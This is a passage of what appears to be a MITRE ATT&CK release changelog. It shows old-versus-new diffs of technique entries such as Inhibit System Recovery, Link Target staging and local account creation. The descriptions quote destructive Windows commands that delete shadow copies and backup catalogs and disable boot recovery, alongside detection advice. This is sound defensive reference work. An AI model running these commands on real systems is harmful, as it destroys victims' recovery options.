>set {default} recoveryenabled no</code>>g boot configuration data - <code>bcdedit.exe /set {default}
 > bootstatuspolicy ignoreallfailures & bcdedit /set {default}
 > recoveryenabled no</code> * <code>REAgentC.exe</code> can b
 >e used to disable Windows Recovery Environment (WinRE) repai
 >r/recovery options of an infected system  On network devices
 >, adversaries may leverage [Disk Wipe](https://attack.mitre.
 >org/techniques/T1561) to delete backup firmware images and r
 >eformat the file system, then [System Shutdown/Reboot](https
 >://attack.mitre.org/techniques/T1529) to reload the device. 
 >Together this activity may leave network devices completely 
 >inoperable and inhibit recovery operations.  Adversaries may
 > also delete “online” backups that are connected to their ne
 >twork – whether via network storage media or through folders
 > that sync to cloud services.(Citation: ZDNet Ransomware Bac
 >kups 2020) In cloud environments, adversaries may disable ve
 >rsioning and backup policies and delete snapshots, machine i
 >mages, and prior versions of objects designed to be used in 
 >disaster recovery scenarios.(Citation: Dark Reading Code Spa
 >ces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ranso
 >mware)

New Mitigations:

Dropped Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 23:26:59.186000+00:002023-04-14 23:09:55.976000+00:00
descriptionAdversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options. Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) A number of native Windows utilities have been used by adversaries to disable or delete system recovery features: * vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet * [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete * wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet * bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled noAdversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options. Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom) A number of native Windows utilities have been used by adversaries to disable or delete system recovery features: * vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet * [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete * wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet * bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no * REAgentC.exe can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations. Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
external_references[1]['source_name']FireEye WannaCry 2017Dark Reading Code Spaces Cyber Attack
external_references[1]['description']Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019. Brian Prince. (2014, June 20). Code Hosting Service Shuts Down After Cyber Attack. Retrieved March 21, 2023.
external_references[1]['url']https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.htmlhttps://www.darkreading.com/attacks-breaches/code-hosting-service-shuts-down-after-cyber-attack
external_references[2]['source_name']Talos Olympic Destroyer 2018FireEye WannaCry 2017
external_references[2]['description']Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.
external_references[2]['url']https://blog.talosintelligence.com/2018/02/olympic-destroyer.htmlhttps://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Service: Service MetadataCommand: Command Execution
x_mitre_data_sources[2]File: File DeletionSnapshot: Snapshot Deletion
x_mitre_data_sources[4]Command: Command ExecutionCloud Storage: Cloud Storage Deletion
x_mitre_detectionUse process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, and bcdedit. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity. Monitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of HKEY_CURRENT_USER\Software\Policies\Microsoft\PreviousVersions\DisableLocalPage).Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, bcdedit and REAgentC. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity. Monitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of HKEY_CURRENT_USER\Software\Policies\Microsoft\PreviousVersions\DisableLocalPage). For network infrastructure devices, collect AAA logging to monitor for `erase`, `format`, and `reload` commands being run in succession.
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Talos Olympic Destroyer 2018', 'description': 'Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.', 'url': 'https://blog.talosintelligence.com/2018/02/olympic-destroyer.html'}
external_references{'source_name': 'Rhino Security Labs AWS S3 Ransomware', 'description': 'Spencer Gietzen. (n.d.). AWS Simple Storage Service S3 Ransomware Part 2: Prevention and Defense. Retrieved March 21, 2023.', 'url': 'https://rhinosecuritylabs.com/aws/s3-ransomware-part-2-prevention-and-defense/'}
external_references{'source_name': 'ZDNet Ransomware Backups 2020', 'description': 'Steve Ranger. (2020, February 27). Ransomware victims thought their backups were safe. They were wrong. Retrieved March 21, 2023.', 'url': 'https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/'}
external_references{'source_name': 'disable_notif_synology_ransom', 'description': 'TheDFIRReport. (2022, March 1). Disabling notifications on Synology servers before ransom. Retrieved October 19, 2022.', 'url': 'https://twitter.com/TheDFIRReport/status/1498657590259109894'}
x_mitre_contributorsAustin Clark, @c2defense
x_mitre_contributorsPallavi Sivakumaran
x_mitre_data_sourcesFile: File Deletion
x_mitre_data_sourcesService: Service Metadata
x_mitre_platformsNetwork
x_mitre_platformsIaaS

[T1003.001] OS Credential Dumping: LSASS Memory

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-06 16:16:53.388000+00:002023-04-03 18:54:21.492000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesCommand: Command Execution
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesCommand: Command Execution

[T1608.005] Stage Capabilities: Link Target

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may put in place resources that are referenced bt1Adversaries may put in place resources that are referenced b
>y a link that can be used during targeting. An adversary may>y a link that can be used during targeting. An adversary may
> rely upon a user clicking a malicious link in order to divu> rely upon a user clicking a malicious link in order to divu
>lge information (including credentials) or to gain execution>lge information (including credentials) or to gain execution
>, as in [Malicious Link](https://attack.mitre.org/techniques>, as in [Malicious Link](https://attack.mitre.org/techniques
>/T1204/001). Links can be used for spearphishing, such as se>/T1204/001). Links can be used for spearphishing, such as se
>nding an email accompanied by social engineering text to coa>nding an email accompanied by social engineering text to coa
>x the user to actively click or copy and paste a URL into a >x the user to actively click or copy and paste a URL into a 
>browser. Prior to a phish for information (as in [Spearphish>browser. Prior to a phish for information (as in [Spearphish
>ing Link](https://attack.mitre.org/techniques/T1598/003)) or>ing Link](https://attack.mitre.org/techniques/T1598/003)) or
> a phish to gain initial access to a system (as in [Spearphi> a phish to gain initial access to a system (as in [Spearphi
>shing Link](https://attack.mitre.org/techniques/T1566/002)),>shing Link](https://attack.mitre.org/techniques/T1566/002)),
> an adversary must set up the resources for a link target fo> an adversary must set up the resources for a link target fo
>r the spearphishing link.   Typically, the resources for a l>r the spearphishing link.   Typically, the resources for a l
>ink target will be an HTML page that may include some client>ink target will be an HTML page that may include some client
>-side script such as [JavaScript](https://attack.mitre.org/t>-side script such as [JavaScript](https://attack.mitre.org/t
>echniques/T1059/007) to decide what content to serve to the >echniques/T1059/007) to decide what content to serve to the 
>user. Adversaries may clone legitimate sites to serve as the>user. Adversaries may clone legitimate sites to serve as the
> link target, this can include cloning of login pages of leg> link target, this can include cloning of login pages of leg
>itimate web services or organization login pages in an effor>itimate web services or organization login pages in an effor
>t to harvest credentials during [Spearphishing Link](https:/>t to harvest credentials during [Spearphishing Link](https:/
>/attack.mitre.org/techniques/T1598/003).(Citation: Malwareby>/attack.mitre.org/techniques/T1598/003).(Citation: Malwareby
>tes Silent Librarian October 2020)(Citation: Proofpoint TA40>tes Silent Librarian October 2020)(Citation: Proofpoint TA40
>7 September 2019) Adversaries may also [Upload Malware](http>7 September 2019) Adversaries may also [Upload Malware](http
>s://attack.mitre.org/techniques/T1608/001) and have the link>s://attack.mitre.org/techniques/T1608/001) and have the link
> target point to malware for download/execution by the user.> target point to malware for download/execution by the user.
>  Adversaries may purchase domains similar to legitimate dom>  Adversaries may purchase domains similar to legitimate dom
>ains (ex: homoglyphs, typosquatting, different top-level dom>ains (ex: homoglyphs, typosquatting, different top-level dom
>ain, etc.) during acquisition of infrastructure ([Domains](h>ain, etc.) during acquisition of infrastructure ([Domains](h
>ttps://attack.mitre.org/techniques/T1583/001)) to help facil>ttps://attack.mitre.org/techniques/T1583/001)) to help facil
>itate [Malicious Link](https://attack.mitre.org/techniques/T>itate [Malicious Link](https://attack.mitre.org/techniques/T
>1204/001). Link shortening services can also be employed. Ad>1204/001). Link shortening services can also be employed. Ad
>versaries may also use free or paid accounts on Platform-as->versaries may also use free or paid accounts on Platform-as-
>a-Service providers to host link targets while taking advant>a-Service providers to host link targets while taking advant
>age of the widely trusted domains of those providers to avoi>age of the widely trusted domains of those providers to avoi
>d being blocked.(Citation: Netskope GCP Redirection)(Citatio>d being blocked.(Citation: Netskope GCP Redirection)(Citatio
>n: Netskope Cloud Phishing)(Citation: Intezer App Service Ph>n: Netskope Cloud Phishing)(Citation: Intezer App Service Ph
>ishing)>ishing) Finally, adversaries may take advantage of the decen
 >tralized nature of the InterPlanetary File System (IPFS) to 
 >host link targets that are difficult to remove.(Citation: Ta
 >los IPFS 2022)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Goldstein Menachem']
values_changed
STIX FieldOld valueNew Value
modified2022-10-20 20:15:57.855000+00:002023-04-11 23:20:48.603000+00:00
descriptionAdversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed. Adversaries may also use free or paid accounts on Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing)Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed. Adversaries may also use free or paid accounts on Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing) Finally, adversaries may take advantage of the decentralized nature of the InterPlanetary File System (IPFS) to host link targets that are difficult to remove.(Citation: Talos IPFS 2022)
external_references[3]['source_name']Malwarebytes Silent Librarian October 2020Talos IPFS 2022
external_references[3]['description']Malwarebytes Threat Intelligence Team. (2020, October 14). Silent Librarian APT right on schedule for 20/21 academic year. Retrieved February 3, 2021.Edmund Brumaghin. (2022, November 9). Threat Spotlight: Cyber Criminal Adoption of IPFS for Phishing, Malware Campaigns. Retrieved March 8, 2023.
external_references[3]['url']https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/https://blog.talosintelligence.com/ipfs-abuse/
external_references[4]['source_name']Intezer App Service PhishingMalwarebytes Silent Librarian October 2020
external_references[4]['description']Paul Litvak. (2020, October 8). Kud I Enter Your Server? New Vulnerabilities in Microsoft Azure. Retrieved August 18, 2022.Malwarebytes Threat Intelligence Team. (2020, October 14). Silent Librarian APT right on schedule for 20/21 academic year. Retrieved February 3, 2021.
external_references[4]['url']https://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/
external_references[5]['source_name']Proofpoint TA407 September 2019Intezer App Service Phishing
external_references[5]['description']Proofpoint Threat Insight Team. (2019, September 5). Threat Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021.Paul Litvak. (2020, October 8). Kud I Enter Your Server? New Vulnerabilities in Microsoft Azure. Retrieved August 18, 2022.
external_references[5]['url']https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarianhttps://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Proofpoint TA407 September 2019', 'description': 'Proofpoint Threat Insight Team. (2019, September 5). Threat Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021.', 'url': 'https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian'}

[T1087.001] Account Discovery: Local Account

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2022-08-25 13:04:39.404000+00:002023-04-13 17:20:22.867000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Process: Process CreationCommand: Command Execution
x_mitre_data_sources[1]Process: OS API ExecutionFile: File Access
x_mitre_data_sources[2]File: File AccessProcess: OS API Execution
x_mitre_data_sources[3]Command: Command ExecutionProcess: Process Creation
x_mitre_version1.31.4

[T1136.001] Create Account: Local Account

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may create a local account to maintain access tot1Adversaries may create a local account to maintain access to
> victim systems. Local accounts are those configured by an o> victim systems. Local accounts are those configured by an o
>rganization for use by users, remote support, services, or f>rganization for use by users, remote support, services, or f
>or administration on a single system or service. With a suff>or administration on a single system or service. With a suff
>icient level of access, the <code>net user /add</code> comma>icient level of access, the <code>net user /add</code> comma
>nd can be used to create a local account. On macOS systems t>nd can be used to create a local account. On macOS systems t
>he <code>dscl -create</code> command can be used to create a>he <code>dscl -create</code> command can be used to create a
> local account.  Such accounts may be used to establish seco> local account. Local accounts may also be added to network 
>ndary credentialed access that do not require persistent rem>devices, often via common [Network Device CLI](https://attac
>ote access tools to be deployed on the system.>k.mitre.org/techniques/T1059/008) commands such as <code>use
 >rname</code>.(Citation: cisco_username_cmd)  Such accounts m
 >ay be used to establish secondary credentialed access that d
 >o not require persistent remote access tools to be deployed 
 >on the system.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_contributors['Austin Clark, @c2defense']
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator']
values_changed
STIX FieldOld valueNew Value
modified2021-08-12 13:04:14.248000+00:002023-04-12 23:23:35.209000+00:00
descriptionAdversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the net user /add command can be used to create a local account. On macOS systems the dscl -create command can be used to create a local account. Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the net user /add command can be used to create a local account. On macOS systems the dscl -create command can be used to create a local account. Local accounts may also be added to network devices, often via common [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as username.(Citation: cisco_username_cmd) Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
external_references[1]['source_name']Microsoft User Creation Eventcisco_username_cmd
external_references[1]['description']Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account was created. Retrieved June 30, 2017.Cisco. (2023, March 6). username - Cisco IOS Security Command Reference: Commands S to Z. Retrieved July 13, 2022.
external_references[1]['url']https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-t2.html#wp1047035630
x_mitre_detectionMonitor for processes and command-line parameters associated with local account creation, such as net user /add , useradd , and dscl -create . Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system. (Citation: Microsoft User Creation Event) Perform regular audits of local system accounts to detect suspicious accounts that may have been created by an adversary.Monitor for processes and command-line parameters associated with local account creation, such as net user /add , useradd , and dscl -create . Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system. (Citation: Microsoft User Creation Event) Perform regular audits of local system accounts to detect suspicious accounts that may have been created by an adversary. For network infrastructure devices, collect AAA logging to monitor for account creations.
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft User Creation Event', 'description': 'Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account was created. Retrieved June 30, 2017.', 'url': 'https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720'}
x_mitre_platformsNetwork

[T1078.003] Valid Accounts: Local Accounts

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-18 17:45:48.323000+00:002023-04-13 17:17:49.889000+00:00
x_mitre_version1.21.3

[T1069.001] Permission Groups Discovery: Local Groups

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-08-25 13:03:08.484000+00:002023-04-07 17:14:42.184000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation

[T1134.003] Access Token Manipulation: Make and Impersonate Token

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may make and impersonate tokens to escalate privt1Adversaries may make new tokens and impersonate users to esc
>ileges and bypass access controls. If an adversary has a use>alate privileges and bypass access controls. For example, if
>rname and password but the user is not logged onto the syste> an adversary has a username and password but the user is no
>m, the adversary can then create a logon session for the use>t logged onto the system the adversary can then create a log
>r using the <code>LogonUser</code> function. The function wi>on session for the user using the `LogonUser` function. The 
>ll return a copy of the new session's access token and the a>function will return a copy of the new session's access toke
>dversary can use <code>SetThreadToken</code> to assign the t>n and the adversary can use `SetThreadToken` to assign the t
>oken to a thread.>oken to a thread.  This behavior is distinct from [Token Imp
 >ersonation/Theft](https://attack.mitre.org/techniques/T1134/
 >001) in that this refers to creating a new user token instea
 >d of stealing or duplicating an existing one.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_contributors['Jonny Johnson']
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-02-18 18:03:37.481000+00:002023-04-11 21:22:17.257000+00:00
descriptionAdversaries may make and impersonate tokens to escalate privileges and bypass access controls. If an adversary has a username and password but the user is not logged onto the system, the adversary can then create a logon session for the user using the LogonUser function. The function will return a copy of the new session's access token and the adversary can use SetThreadToken to assign the token to a thread.Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the `LogonUser` function. The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread. This behavior is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) in that this refers to creating a new user token instead of stealing or duplicating an existing one.
x_mitre_data_sources[0]Process: OS API ExecutionCommand: Command Execution
x_mitre_data_sources[1]Command: Command ExecutionProcess: OS API Execution
x_mitre_version1.01.1

[T1204.002] User Execution: Malicious File

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-20 17:19:50.801000+00:002023-04-21 12:22:19.740000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.21.3

[T1036] Masquerading

Current version: 1.5

Version changed from: 1.4 → 1.5

New Mitigations:

Dropped Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-05 04:56:08.978000+00:002023-04-07 17:04:34.648000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Service: Service CreationFile: File Modification
x_mitre_data_sources[1]Scheduled Job: Scheduled Job MetadataService: Service Creation
x_mitre_data_sources[2]Scheduled Job: Scheduled Job ModificationScheduled Job: Scheduled Job Metadata
x_mitre_data_sources[3]Service: Service MetadataScheduled Job: Scheduled Job Modification
x_mitre_data_sources[4]File: File MetadataProcess: Process Metadata
x_mitre_data_sources[7]Process: Process MetadataService: Service Metadata
x_mitre_data_sources[8]File: File ModificationFile: File Metadata
x_mitre_version1.41.5
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/177.html', 'external_id': 'CAPEC-177'}

[T1556] Modify Authentication Process

Current version: 2.3

Version changed from: 2.2 → 2.3

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-18 16:28:56.126000+00:002023-04-11 03:17:32.211000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Windows Registry: Windows Registry Key ModificationActive Directory: Active Directory Object Modification
x_mitre_data_sources[2]User Account: User Account AuthenticationFile: File Modification
x_mitre_data_sources[4]File: File CreationApplication Log: Application Log Content
x_mitre_data_sources[5]Logon Session: Logon Session CreationWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[6]File: File ModificationProcess: OS API Execution
x_mitre_data_sources[7]Application Log: Application Log ContentProcess: Process Access
x_mitre_data_sources[8]Process: OS API ExecutionLogon Session: Logon Session Creation
x_mitre_data_sources[9]Active Directory: Active Directory Object ModificationWindows Registry: Windows Registry Key Creation
x_mitre_data_sources[10]Process: Process AccessUser Account: User Account Authentication
x_mitre_version2.22.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Creation

[T1112] Modify Registry

Current version: 1.3

Version changed from: 1.2 → 1.3

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
external_referencesMicrosoft. (2012, April 17). Reg. Retrieved May 1, 2015.
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator', 'SYSTEM']
external_referencesCAPEC-203
values_changed
STIX FieldOld valueNew Value
modified2020-08-13 20:02:49.641000+00:002023-04-21 12:19:38.962000+00:00
external_references[1]['source_name']capecMicrosoft Reg
external_references[1]['url']https://capec.mitre.org/data/definitions/203.htmlhttps://technet.microsoft.com/en-us/library/cc732643.aspx
external_references[2]['source_name']Microsoft RegMicrosoft Remote
external_references[2]['description']Microsoft. (2012, April 17). Reg. Retrieved May 1, 2015.Microsoft. (n.d.). Enable the Remote Registry Service. Retrieved May 1, 2015.
external_references[2]['url']https://technet.microsoft.com/en-us/library/cc732643.aspxhttps://technet.microsoft.com/en-us/library/cc754820.aspx
external_references[3]['source_name']Microsoft Reghide NOV 2006Microsoft 4657 APR 2017
external_references[3]['description']Russinovich, M. & Sharkey, K. (2006, January 10). Reghide. Retrieved August 9, 2018.Miroshnikov, A. & Hall, J. (2017, April 18). 4657(S): A registry value was modified. Retrieved August 9, 2018.
external_references[3]['url']https://docs.microsoft.com/sysinternals/downloads/reghidehttps://docs.microsoft.com/windows/security/threat-protection/auditing/event-4657
external_references[4]['source_name']TrendMicro POWELIKS AUG 2014SpectorOps Hiding Reg Jul 2017
external_references[4]['description']Santos, R. (2014, August 1). POWELIKS: Malware Hides In Windows Registry. Retrieved August 9, 2018.Reitz, B. (2017, July 14). Hiding Registry keys with PSReflect. Retrieved August 9, 2018.
external_references[4]['url']https://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353
external_references[5]['source_name']SpectorOps Hiding Reg Jul 2017Microsoft Reghide NOV 2006
external_references[5]['description']Reitz, B. (2017, July 14). Hiding Registry keys with PSReflect. Retrieved August 9, 2018.Russinovich, M. & Sharkey, K. (2006, January 10). Reghide. Retrieved August 9, 2018.
external_references[5]['url']https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353https://docs.microsoft.com/sysinternals/downloads/reghide
external_references[6]['source_name']Microsoft RemoteMicrosoft RegDelNull July 2016
external_references[6]['description']Microsoft. (n.d.). Enable the Remote Registry Service. Retrieved May 1, 2015.Russinovich, M. & Sharkey, K. (2016, July 4). RegDelNull v1.11. Retrieved August 10, 2018.
external_references[6]['url']https://technet.microsoft.com/en-us/library/cc754820.aspxhttps://docs.microsoft.com/en-us/sysinternals/downloads/regdelnull
external_references[7]['source_name']Microsoft 4657 APR 2017TrendMicro POWELIKS AUG 2014
external_references[7]['description']Miroshnikov, A. & Hall, J. (2017, April 18). 4657(S): A registry value was modified. Retrieved August 9, 2018.Santos, R. (2014, August 1). POWELIKS: Malware Hides In Windows Registry. Retrieved August 9, 2018.
external_references[7]['url']https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4657https://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/
x_mitre_data_sources[0]Process: Process CreationWindows Registry: Windows Registry Key Deletion
x_mitre_data_sources[5]Process: OS API ExecutionProcess: Process Creation
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
